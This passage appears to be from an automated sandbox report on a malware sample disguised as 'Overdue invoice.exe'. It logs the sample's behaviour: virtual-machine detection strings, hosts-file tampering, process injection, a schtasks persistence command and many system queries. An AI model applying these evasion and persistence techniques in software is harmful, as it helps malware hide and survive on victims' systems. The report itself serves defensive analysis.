                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\Overdue invoice.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Overdue invoice.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Overdue invoice.exeWindow / User API: threadDelayed 4378
                    Source: C:\Users\user\Desktop\Overdue invoice.exeWindow / User API: threadDelayed 4299
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeWindow / User API: threadDelayed 3465
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeWindow / User API: threadDelayed 5329
                    Source: C:\Users\user\Desktop\Overdue invoice.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Overdue invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Overdue invoice.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeThread delayed: delay time: 922337203685477
                    Source: yqWDN.exe, 0000000F.00000002.371657286.0000000000E62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
                    Source: yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
                    Source: yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                    Source: yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                    Source: yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                    Source: yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                    Source: yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                    Source: Overdue invoice.exe, 00000007.00000002.521324973.0000000001715000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\Overdue invoice.exeMemory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Modifies the hosts file
                    Source: C:\Users\user\Desktop\Overdue invoice.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\Overdue invoice.exeMemory written: C:\Users\user\Desktop\Overdue invoice.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeMemory written: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmpA306.tmp
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess created: C:\Users\user\Desktop\Overdue invoice.exe {path}
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess created: C:\Users\user\Desktop\Overdue invoice.exe {path}
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmp2055.tmp
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess created: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe {path}
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Users\user\Desktop\Overdue invoice.exe VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
